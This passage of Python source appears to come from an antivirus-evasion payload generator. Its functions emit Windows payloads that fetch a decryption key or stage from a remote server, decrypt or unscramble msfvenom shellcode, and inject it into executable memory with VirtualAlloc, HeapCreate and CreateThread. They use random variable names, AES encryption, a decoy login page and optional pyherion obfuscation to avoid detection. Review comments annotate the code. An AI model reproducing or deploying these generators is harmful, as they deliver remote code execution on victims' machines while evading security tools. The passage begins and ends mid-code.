<a rel="nofollow" href="http://www.google.com">Register</a> | <a href="http://www.google.com" title="Password Lost and Found">Lost your password?</a> </p> <p id="backtoblog"><a href="http://" title="Are you lost?">← Back to main page</a></p> </div> <div class="clear"></div> </body></html> """
        html_data += '<!--' + RandHttpstring + '-->'
        html_data = str(html_data)
        f.write(html_data)
        f.close()
        # Encrypt the shellcode with a key derived from the page body. In this
        # branch `secret` is discarded: the payload recomputes the key itself.
        (EncodedShellcode, secret) = encryption.encryptAES_http_request(Shellcode, html_data)
        # Create Payload code (`os` is imported but never used by the payload)
        PayloadCode = 'import ctypes\n'
        PayloadCode += 'from Crypto.Cipher import AES\n'
        PayloadCode += 'import base64\n'
        PayloadCode += 'import os\n'
        PayloadCode += 'import time\n'
        PayloadCode += 'import md5\n'
        PayloadCode += 'import urllib2\n'
        PayloadCode += 'opener = urllib2.build_opener()\n'
        # Emits: opener.addheaders = [('User-agent', '<UA>')]
        PayloadCode += 'opener.addheaders' + ' = ' '[(' + USER_AGENT + '\')]' '\n'
        # Define Target Server "Key hosting server"
        PayloadCode += RandKeyServer + ' = ' '"' + TARGET_SERVER + '"' '\n'
        PayloadCode += 'while True:\n'
        PayloadCode += ' try:\n'
        # Open Target Server with HTTP GET request
        PayloadCode += ' ' + RandResponse + '= opener.open(' + RandKeyServer + ') \n'
        # Only a 200 is accepted as "key available"; the page is fetched a
        # second time below to read the body.
        PayloadCode += ' if ' + RandResponse + '.code == 200:\n'
        # Opening and requesting HTML from Target Server
        PayloadCode += ' ' + RandHttpKey + ' = opener.open(' + RandKeyServer + ').read()\n'
        PayloadCode += ' ' + RandMD5 + ' = md5.new()\n'
        PayloadCode += ' ' + RandHttpKey + ' = str(' + RandHttpKey + ')\n'
        # Generate MD5 hash of the served page; it becomes the AES key
        PayloadCode += ' ' + RandMD5 + '.update(' + RandHttpKey + ')\n'
        # hexdigest() is 32 ASCII characters, which PyCrypto's AES.new()
        # accepts as a 32-byte (AES-256) key.
        PayloadCode += ' ' + RandHttpKey + ' = ' + RandMD5 + '.hexdigest()\n'
        # Convert to String for functions
        PayloadCode += ' ' + RandHttpKey + ' = str(' + RandHttpKey + ')\n'
        # Break out to decryption
        PayloadCode += ' break\n'
        # On failure sleep SLEEP_TIME seconds and retry (see NOTE on URLError)
        PayloadCode += ' except URLError, e:\n'
        PayloadCode += ' time.sleep(' + self.required_options["SLEEP_TIME"][0] + ')\n'
        PayloadCode += ' pass\n'
        # Decrypt (ECB via AES.new(key) with no mode), strip '{' padding,
        # unescape, then inject via VirtualAlloc/RtlMoveMemory/CreateThread.
        PayloadCode += RandPadding + ' = \'{\'\n'
        PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
        PayloadCode += RandCipherObject + ' = AES.new(' + RandHttpKey + ')\n'
        PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
        PayloadCode += RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
        # 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE
        PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
        PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n'
        PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n'
        PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
        PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
        if self.required_options["USE_PYHERION"][0].lower() == "y":
            PayloadCode = encryption.pyherion(PayloadCode)
        return PayloadCode
    elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
        TARGET_SERVER = str(self.required_options["TARGET_SERVER"][0])
        target_html_file = str(TARGET_SERVER.split('/')[-1])
        # NOTE(review): unlike the "virtual" branch this is a bare
        # "User-Agent: ..." string, and it is assigned to opener.addheaders
        # as a quoted string below; urllib2 expects a list of (name, value)
        # tuples there, so the request is very likely broken — verify.
        USER_AGENT = "User-Agent: " + self.required_options['USER_AGENT'][0]
        # Generate Shellcode Using msfvenom
        Shellcode = self.shellcode.generate(self.required_options)
        # Generate Random Variable Names (RandShellCode, RandToday, RandExpire
        # are assigned but never used in this branch)
        ShellcodeVariableName = helpers.randomString()
        RandPtr = helpers.randomString()
        RandBuf = helpers.randomString()
        RandHt = helpers.randomString()
        RandDecodeAES = helpers.randomString()
        RandCipherObject = helpers.randomString()
        RandDecodedShellcode = helpers.randomString()
        RandShellCode = helpers.randomString()
        RandPadding = helpers.randomString()
        RandToday = helpers.randomString()
        RandExpire = helpers.randomString()
        HeapVar = helpers.randomString()
        # Define Random Variable Names for HTTP functions (RandSleep is unused)
        RandResponse = helpers.randomString()
        RandHttpKey = helpers.randomString()
        RandMD5 = helpers.randomString()
        RandKeyServer = helpers.randomString()
        RandSleep = helpers.randomString()
        # Define Random Variable Names for HTML Functions
        RandHttpstring = helpers.randomString()
        # Generate the decoy HTML page the web server must host
        f = open(str(self.required_options["HTML_FILE_PATH"][0]) + target_html_file, 'w')
        html_data = """ <!DOCTYPE html> <!--[if IE 8]> <html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US"> <![endif]--> <!--[if !(IE 8) ]><!--> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><!--<![endif]--><head> <form name="loginform" id="loginform" action="http://mainpage/wp-login.php" method="post"> <p> <label for="user_login">Username<br> <input name="log" id="user_login" class="input" size="20" type="text"></label> </p> <p> <label for="user_pass">Password<br> <input name="pwd" id="user_pass" class="input" value="" size="20" type="password"></label> </p> <p class="forgetmenot"><label for="rememberme"><input name="rememberme" id="rememberme" value="forever" type="checkbox"> Remember Me</label></p> <p class="submit"> <input name="wp-submit" id="wp-submit" class="button button-primary button-large" value="Log In" type="submit"> <input name="redirect_to" value="http://www.google.com" type="hidden"> <input name="testcookie" value="1" type="hidden"> </p> </form> <p id="nav"> <a rel="nofollow" href="http://www.google.com">Register</a> | <a href="http://www.google.com" title="Password Lost and Found">Lost your password?</a> </p> <p id="backtoblog"><a href="http://" title="Are you lost?">← Back to main page</a></p> </div> <div class="clear"></div> </body></html> """
        html_data += '<!--' + RandHttpstring + '-->'
        html_data = str(html_data)
        f.write(html_data)
        f.close()
        # Encrypt the shellcode; here `secret` IS embedded in the payload, so
        # the fetched page only gates execution (RandHttpKey is computed and
        # then ignored).
        (EncodedShellcode, secret) = encryption.encryptAES_http_request(Shellcode, html_data)
        # Create Payload code
        PayloadCode = 'import ctypes\n'
        PayloadCode += 'from Crypto.Cipher import AES\n'
        PayloadCode += 'import base64\n'
        PayloadCode += 'import os\n'
        PayloadCode += 'import time\n'
        PayloadCode += 'import md5\n'
        PayloadCode += 'import urllib2\n'
        PayloadCode += 'opener = urllib2.build_opener()\n'
        # Emits: opener.addheaders = "User-Agent: <UA>"  (see NOTE above)
        PayloadCode += 'opener.addheaders' + ' = ' '"' + USER_AGENT + '"' '\n'
        # Define Target Server "Key hosting server"
        PayloadCode += RandKeyServer + ' = ' '"' + TARGET_SERVER + '"' '\n'
        PayloadCode += 'while True:\n'
        PayloadCode += ' try:\n'
        # Open Target Server with HTTP GET request
        PayloadCode += ' ' + RandResponse + '= opener.open(' + RandKeyServer + ') \n'
        # Check to see if server returns a 200 code or if not its most likely a 400 code
        PayloadCode += ' if ' + RandResponse + '.code == 200:\n'
        # Opening and requesting HTML from Target Server
        PayloadCode += ' ' + RandHttpKey + ' = opener.open(' + RandKeyServer + ').read()\n'
        PayloadCode += ' ' + RandMD5 + ' = md5.new()\n'
        PayloadCode += ' ' + RandHttpKey + ' = str(' + RandHttpKey + ')\n'
        # Generate MD5 hash of HTML on page (unused in this branch)
        PayloadCode += ' ' + RandMD5 + '.update(' + RandHttpKey + ')\n'
        # hexdigest() yields 32 ASCII characters
        PayloadCode += ' ' + RandHttpKey + ' = ' + RandMD5 + '.hexdigest()\n'
        # Convert to String for functions
        PayloadCode += ' ' + RandHttpKey + ' = str(' + RandHttpKey + ')\n'
        # Break out to decryption
        PayloadCode += ' break\n'
        # On failure sleep SLEEP_TIME seconds and retry (URLError is unbound,
        # see class docstring NOTE)
        PayloadCode += ' except URLError, e:\n'
        PayloadCode += ' time.sleep(' + self.required_options["SLEEP_TIME"][0] + ')\n'
        PayloadCode += ' pass\n'
        # Decrypt with the embedded secret, then inject into a private heap
        PayloadCode += RandPadding + ' = \'{\'\n'
        PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
        PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n'
        PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
        PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
        # 0x00040000 = HEAP_CREATE_ENABLE_EXECUTE; heap sized to 2x shellcode
        PayloadCode += HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + ShellcodeVariableName + ') * 2),ctypes.c_int(0))\n'
        # 0x00000008 = HEAP_ZERO_MEMORY
        PayloadCode += RandPtr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + ShellcodeVariableName + ')))\n'
        PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
        PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
        PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
        PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
        if self.required_options["USE_PYHERION"][0].lower() == "y":
            PayloadCode = encryption.pyherion(PayloadCode)
        return PayloadCode
    else:
        # Only the non-expiring variant exists for this injection method;
        # any other EXPIRE_PAYLOAD value falls through and returns None.
        if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
            TARGET_SERVER = str(self.required_options["TARGET_SERVER"][0])
            target_html_file = str(TARGET_SERVER.split('/')[-1])
            # Same bare-string User-Agent as the "heap" branch (see NOTE there)
            USER_AGENT = "User-Agent: " + self.required_options['USER_AGENT'][0]
            # Generate Shellcode Using msfvenom
            Shellcode = self.shellcode.generate(self.required_options)
            # Generate Random Variable Names (RandPtr/RandBuf/RandHt/
            # RandShellCode/RandReverseShell are unused in this branch)
            ShellcodeVariableName = helpers.randomString()
            RandPtr = helpers.randomString()
            RandBuf = helpers.randomString()
            RandHt = helpers.randomString()
            RandDecodeAES = helpers.randomString()
            RandCipherObject = helpers.randomString()
            RandDecodedShellcode = helpers.randomString()
            RandShellCode = helpers.randomString()
            RandPadding = helpers.randomString()
            RandShellcode = helpers.randomString()
            RandReverseShell = helpers.randomString()
            RandMemoryShell = helpers.randomString()
            # Define Random Variable Names for HTTP functions (RandSleep unused)
            RandResponse = helpers.randomString()
            RandHttpKey = helpers.randomString()
            RandMD5 = helpers.randomString()
            RandKeyServer = helpers.randomString()
            RandSleep = helpers.randomString()
            # Define Random Variable Names for HTML Functions
            RandHttpstring = helpers.randomString()
            # Generate the decoy HTML page the web server must host
            f = open(str(self.required_options["HTML_FILE_PATH"][0]) + target_html_file, 'w')
            html_data = """ <!DOCTYPE html> <!--[if IE 8]> <html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US"> <![endif]--> <!--[if !(IE 8) ]><!--> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><!--<![endif]--><head> <form name="loginform" id="loginform" action="http://mainpage/wp-login.php" method="post"> <p> <label for="user_login">Username<br> <input name="log" id="user_login" class="input" size="20" type="text"></label> </p> <p> <label for="user_pass">Password<br> <input name="pwd" id="user_pass" class="input" value="" size="20" type="password"></label> </p> <p class="forgetmenot"><label for="rememberme"><input name="rememberme" id="rememberme" value="forever" type="checkbox"> Remember Me</label></p> <p class="submit"> <input name="wp-submit" id="wp-submit" class="button button-primary button-large" value="Log In" type="submit"> <input name="redirect_to" value="http://www.google.com" type="hidden"> <input name="testcookie" value="1" type="hidden"> </p> </form> <p id="nav"> <a rel="nofollow" href="http://www.google.com">Register</a> | <a href="http://www.google.com" title="Password Lost and Found">Lost your password?</a> </p> <p id="backtoblog"><a href="http://" title="Are you lost?">← Back to main page</a></p> </div> <div class="clear"></div> </body></html> """
            html_data += '<!--' + RandHttpstring + '-->'
            html_data = str(html_data)
            f.write(html_data)
            f.close()
            # Encrypt the shellcode; `secret` is embedded in the payload below
            (EncodedShellcode, secret) = encryption.encryptAES_http_request(Shellcode, html_data)
            # Create Payload code. The datetime imports are emitted but no
            # expiry check follows — this branch never expires.
            PayloadCode = 'from ctypes import *\n'
            PayloadCode += 'from Crypto.Cipher import AES\n'
            PayloadCode += 'import base64\n'
            PayloadCode += 'import os\n'
            PayloadCode += 'import time\n'
            PayloadCode += 'import md5\n'
            PayloadCode += 'import urllib2\n'
            PayloadCode += 'opener = urllib2.build_opener()\n'
            PayloadCode += 'opener.addheaders' + ' = ' '"' + USER_AGENT + '"' '\n'
            PayloadCode += 'from datetime import datetime\n'
            PayloadCode += 'from datetime import date\n\n'
            # Define Target Server "Key hosting server"
            PayloadCode += RandKeyServer + ' = ' '"' + TARGET_SERVER + '"' '\n'
            PayloadCode += 'while True:\n'
            PayloadCode += ' try:\n'
            # Open Target Server with HTTP GET request
            PayloadCode += ' ' + RandResponse + '= opener.open(' + RandKeyServer + ') \n'
            # Check to see if server returns a 200 code or if not its most likely a 400 code
            PayloadCode += ' if ' + RandResponse + '.code == 200:\n'
            # Opening and requesting HTML from Target Server
            PayloadCode += ' ' + RandHttpKey + ' = opener.open(' + RandKeyServer + ').read()\n'
            PayloadCode += ' ' + RandMD5 + ' = md5.new()\n'
            PayloadCode += ' ' + RandHttpKey + ' = str(' + RandHttpKey + ')\n'
            # Generate MD5 hash of HTML on page (unused in this branch)
            PayloadCode += ' ' + RandMD5 + '.update(' + RandHttpKey + ')\n'
            # hexdigest() yields 32 ASCII characters
            PayloadCode += ' ' + RandHttpKey + ' = ' + RandMD5 + '.hexdigest()\n'
            # Convert to String for functions
            PayloadCode += ' ' + RandHttpKey + ' = str(' + RandHttpKey + ')\n'
            # Break out to decryption
            PayloadCode += ' break\n'
            # On failure sleep SLEEP_TIME seconds and retry (URLError unbound)
            PayloadCode += ' except URLError, e:\n'
            PayloadCode += ' time.sleep(' + self.required_options["SLEEP_TIME"][0] + ')\n'
            PayloadCode += ' pass\n'
            # Decrypt with the embedded secret and call the buffer directly
            # through a CFUNCTYPE cast (no explicit RWX allocation here).
            PayloadCode += RandPadding + ' = \'{\'\n'
            PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
            PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n'
            PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
            PayloadCode += ShellcodeVariableName + ' = ' + RandDecodedShellcode + '.decode("string_escape")\n'
            PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
            PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
            PayloadCode += RandShellcode + '()'
            if self.required_options["USE_PYHERION"][0].lower() == "y":
                PayloadCode = encryption.pyherion(PayloadCode)
            return PayloadCode
def generate(self):
    """Build a pure-Python reverse-HTTPS stager for a Metasploit handler.

    The emitted script defines three randomly named functions: a byte-sum
    checksum helper, a URI generator that brute-forces a short random path
    whose 8-bit checksum is 92, and a downloader that GETs
    https://LHOST:LPORT/<uri> and returns the body. The body is then copied
    into RWX memory and run on a new thread. No other options are read.

    Returns:
        The stager source as a str, wrapped by encryption.pyherion() when
        USE_PYHERION is "y".

    NOTE(review): 92 appears to be the URI checksum Metasploit's reverse_http(s)
    handler recognises as a Windows stage request — confirm against the
    handler version in use. The downloader does no TLS verification or
    response integrity check beyond a Content-Length size gate, so whoever
    answers on LHOST:LPORT controls what gets executed.
    """
    # struct and httplib are imported by the stager but never used by it
    payloadCode = "import urllib2, string, random, struct, ctypes, httplib, time\n"
    # randomize everything, yo'
    sumMethodName = helpers.randomString()
    checkinMethodName = helpers.randomString()
    randLettersName = helpers.randomString()
    randLetterSubName = helpers.randomString()
    randBaseName = helpers.randomString()
    downloadMethodName = helpers.randomString()
    hostName = helpers.randomString()
    portName = helpers.randomString()
    requestName = helpers.randomString()
    tName = helpers.randomString()
    injectMethodName = helpers.randomString()
    dataName = helpers.randomString()
    byteArrayName = helpers.randomString()
    ptrName = helpers.randomString()
    bufName = helpers.randomString()
    handleName = helpers.randomString()
    data2Name = helpers.randomString()
    proxy_var = helpers.randomString()
    opener_var = helpers.randomString()
    # helper method that returns the sum of all ord values in a string % 0x100
    payloadCode += "def %s(s): return sum([ord(ch) for ch in s]) %% 0x100\n" %(sumMethodName)
    # URI generator: up to 64 attempts of a random 3-char base plus one extra
    # character, returning the first 4-char string whose checksum is 92.
    # Falls off the end (returns None) if none of the 64 rounds succeed.
    payloadCode += "def %s():\n\tfor x in xrange(64):\n" %(checkinMethodName)
    payloadCode += "\t\t%s = ''.join(random.sample(string.ascii_letters + string.digits,3))\n" %(randBaseName)
    payloadCode += "\t\t%s = ''.join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random()))\n" %(randLettersName)
    payloadCode += "\t\tfor %s in %s:\n" %(randLetterSubName, randLettersName)
    payloadCode += "\t\t\tif %s(%s + %s) == 92: return %s + %s\n" %(sumMethodName, randBaseName, randLetterSubName, randBaseName, randLetterSubName)
    # Downloader: honours the system proxy via ProxyHandler(), sends a fixed
    # IE6-style User-Agent, and returns '' on any URLError.
    payloadCode += "def %s(%s,%s):\n" %(downloadMethodName, hostName, portName)
    payloadCode += "\t" + proxy_var + " = urllib2.ProxyHandler()\n"
    payloadCode += "\t" + opener_var + " = urllib2.build_opener(" + proxy_var + ")\n"
    payloadCode += "\turllib2.install_opener(" + opener_var + ")\n"
    payloadCode += "\t%s = urllib2.Request(\"https://%%s:%%s/%%s\" %%(%s,%s,%s()), None, {'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'})\n" %(requestName, hostName, portName, checkinMethodName)
    payloadCode += "\ttry:\n"
    payloadCode += "\t\t%s = urllib2.urlopen(%s)\n" %(tName, requestName)
    payloadCode += "\t\ttry:\n"
    # Size gate: only bodies declared larger than 100000 bytes are accepted as
    # a stage; a missing/unparseable Content-Length hits the bare except and
    # is read unconditionally.
    payloadCode += "\t\t\tif int(%s.info()[\"Content-Length\"]) > 100000: return %s.read()\n" %(tName, tName)
    payloadCode += "\t\t\telse: return ''\n"
    payloadCode += "\t\texcept: return %s.read()\n" % (tName)
    payloadCode += "\texcept urllib2.URLError, e: return ''\n"
    # Injector: skipped entirely when the download returned ''.
    # 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE
    payloadCode += "def %s(%s):\n" %(injectMethodName, dataName)
    payloadCode += "\tif %s != \"\":\n" %(dataName)
    payloadCode += "\t\t%s = bytearray(%s)\n" %(byteArrayName, dataName)
    payloadCode += "\t\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)), ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" %(ptrName, byteArrayName)
    payloadCode += "\t\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)\n" %(bufName, byteArrayName, byteArrayName)
    payloadCode += "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s),%s, ctypes.c_int(len(%s)))\n" %(ptrName, bufName, byteArrayName)
    payloadCode += "\t\t%s = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" %(handleName, ptrName)
    payloadCode += "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(%s),ctypes.c_int(-1))\n" %(handleName)
    # Entry point: download the stage from LHOST:LPORT and inject it
    payloadCode += "%s = ''\n" %(data2Name)
    payloadCode += "%s = %s(\"%s\", %s)\n" %(data2Name, downloadMethodName, self.required_options["LHOST"][0], self.required_options["LPORT"][0])
    payloadCode += "%s(%s)\n" %(injectMethodName, data2Name)
    if self.required_options["USE_PYHERION"][0].lower() == "y":
        payloadCode = encryption.pyherion(payloadCode)
    return payloadCode
def generate(self):
    """Build a Python payload that hides shellcode with a one-letter substitution.

    The msfvenom shellcode is string_escaped ("\\x.." form) and one random hex
    letter (a-f) is swapped for one random non-hex letter (g-z) so the literal
    no longer looks like an escape sequence; the payload reverses the swap with
    string.maketrans/translate, unescapes, and injects. Six variants are
    emitted from the inject_method x expire_payload options:

      * "virtual": VirtualAlloc + RtlMoveMemory + CreateThread
      * "heap":    HeapCreate/HeapAlloc + RtlMoveMemory + CreateThread
      * other:     create_string_buffer cast to CFUNCTYPE and called

    each with a plain form (expire_payload == "x") and a date-gated form that
    only runs before today + expire_payload days (compared as "%y-%m-%d").

    Returns:
        The payload source as a str, optionally wrapped by pyherion when
        use_pyherion is "y".

    NOTE(review): the substitution is not injective. Any literal occurrence of
    decode_with_this already present in the escaped shellcode (string_escape
    leaves printable bytes as-is) is also mapped back to encode_with_this by
    the payload, corrupting that byte.
    NOTE(review): the two "heap" variants call crypters.pyherion() while every
    other variant calls encryption.pyherion(); the file's imports decide which
    of those names actually exists — confirm.
    """
    #Random letter substition variables
    hex_letters = "abcdef"
    non_hex_letters = "ghijklmnopqrstuvwxyz"
    encode_with_this = random.choice(hex_letters)
    decode_with_this = random.choice(non_hex_letters)
    # Generate Shellcode Using msfvenom (no options passed, unlike siblings)
    Shellcode = self.shellcode.generate()
    # Generate Random Variable Names
    subbed_shellcode_variable_name = helpers.randomString()
    shellcode_variable_name = helpers.randomString()
    rand_ptr = helpers.randomString()
    rand_buf = helpers.randomString()
    rand_ht = helpers.randomString()
    rand_decoded_letter = helpers.randomString()
    rand_correct_letter = helpers.randomString()
    rand_sub_scheme = helpers.randomString()
    # Generator-side table: hex letter -> non-hex letter. The payload builds
    # the inverse table at runtime from the two single-letter strings.
    sub_scheme = string.maketrans(encode_with_this, decode_with_this)
    # Escaping Shellcode
    Shellcode = Shellcode.encode("string_escape")
    if self.required_options["inject_method"][0].lower() == "virtual":
        if self.required_options["expire_payload"][0].lower() == "x":
            # Create Payload File
            payload_code = 'import ctypes\n'
            payload_code += 'from string import maketrans\n'
            payload_code += rand_decoded_letter + ' = "%s"\n' % decode_with_this
            payload_code += rand_correct_letter + ' = "%s"\n' % encode_with_this
            payload_code += rand_sub_scheme + ' = maketrans(' + rand_decoded_letter + ', ' + rand_correct_letter + ')\n'
            # Embed the substituted escaped shellcode as a plain string literal
            payload_code += subbed_shellcode_variable_name + ' = \"' + Shellcode.translate(sub_scheme) + '\"\n'
            payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
            payload_code += shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n'
            # 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE
            payload_code += rand_ptr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + shellcode_variable_name + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
            payload_code += rand_buf + ' = (ctypes.c_char * len(' + shellcode_variable_name + ')).from_buffer(' + shellcode_variable_name + ')\n'
            payload_code += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + rand_ptr + '),' + rand_buf + ',ctypes.c_int(len(' + shellcode_variable_name + ')))\n'
            payload_code += rand_ht + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + rand_ptr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
            payload_code += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + rand_ht + '),ctypes.c_int(-1))\n'
            if self.required_options["use_pyherion"][0].lower() == "y":
                payload_code = encryption.pyherion(payload_code)
            return payload_code
        else:
            # Expiry date = today + expire_payload days; str(date) is
            # YYYY-MM-DD and [2:] drops the century to match "%y-%m-%d".
            todaysdate = date.today()
            expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
            # Extra Variables
            RandToday = helpers.randomString()
            RandExpire = helpers.randomString()
            # Create Payload File
            payload_code = 'import ctypes\n'
            payload_code += 'from string import maketrans\n'
            payload_code += 'from datetime import datetime\n'
            payload_code += 'from datetime import date\n\n'
            payload_code += RandToday + ' = datetime.now()\n'
            payload_code += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
            # Everything below is indented one tab under this date check
            payload_code += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
            payload_code += '\t' + rand_decoded_letter + ' = "%s"\n' % decode_with_this
            payload_code += '\t' + rand_correct_letter + ' = "%s"\n' % encode_with_this
            payload_code += '\t' + rand_sub_scheme + ' = maketrans(' + rand_decoded_letter + ', ' + rand_correct_letter + ')\n'
            payload_code += '\t' + subbed_shellcode_variable_name + ' = \"' + Shellcode.translate(sub_scheme) + '\"\n'
            payload_code += '\t' + subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
            payload_code += '\t' + shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n'
            payload_code += '\t' + rand_ptr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + shellcode_variable_name + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
            payload_code += '\t' + rand_buf + ' = (ctypes.c_char * len(' + shellcode_variable_name + ')).from_buffer(' + shellcode_variable_name + ')\n'
            payload_code += '\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + rand_ptr + '),' + rand_buf + ',ctypes.c_int(len(' + shellcode_variable_name + ')))\n'
            payload_code += '\t' + rand_ht + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + rand_ptr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
            payload_code += '\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + rand_ht + '),ctypes.c_int(-1))\n'
            if self.required_options["use_pyherion"][0].lower() == "y":
                payload_code = encryption.pyherion(payload_code)
            return payload_code
    # Both "virtual" paths return above, so this if/else covers "heap" and
    # every remaining value of inject_method.
    if self.required_options["inject_method"][0].lower() == "heap":
        if self.required_options["expire_payload"][0].lower() == "x":
            HeapVar = helpers.randomString()
            # Create Payload File
            payload_code = 'import ctypes\n'
            payload_code += 'from string import maketrans\n'
            payload_code += rand_decoded_letter + ' = "%s"\n' % decode_with_this
            payload_code += rand_correct_letter + ' = "%s"\n' % encode_with_this
            payload_code += rand_sub_scheme + ' = maketrans(' + rand_decoded_letter + ', ' + rand_correct_letter + ')\n'
            payload_code += subbed_shellcode_variable_name + ' = \"' + Shellcode.translate(sub_scheme) + '\"\n'
            payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
            # The bytearray line is emitted twice (harmless duplicate)
            payload_code += shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n'
            payload_code += shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n'
            # 0x00040000 = HEAP_CREATE_ENABLE_EXECUTE, 0x00000008 = HEAP_ZERO_MEMORY
            payload_code += HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + shellcode_variable_name + ') * 2),ctypes.c_int(0))\n'
            payload_code += rand_ptr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + shellcode_variable_name + ')))\n'
            payload_code += rand_buf + ' = (ctypes.c_char * len(' + shellcode_variable_name + ')).from_buffer(' + shellcode_variable_name + ')\n'
            payload_code += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + rand_ptr + '),' + rand_buf + ',ctypes.c_int(len(' + shellcode_variable_name + ')))\n'
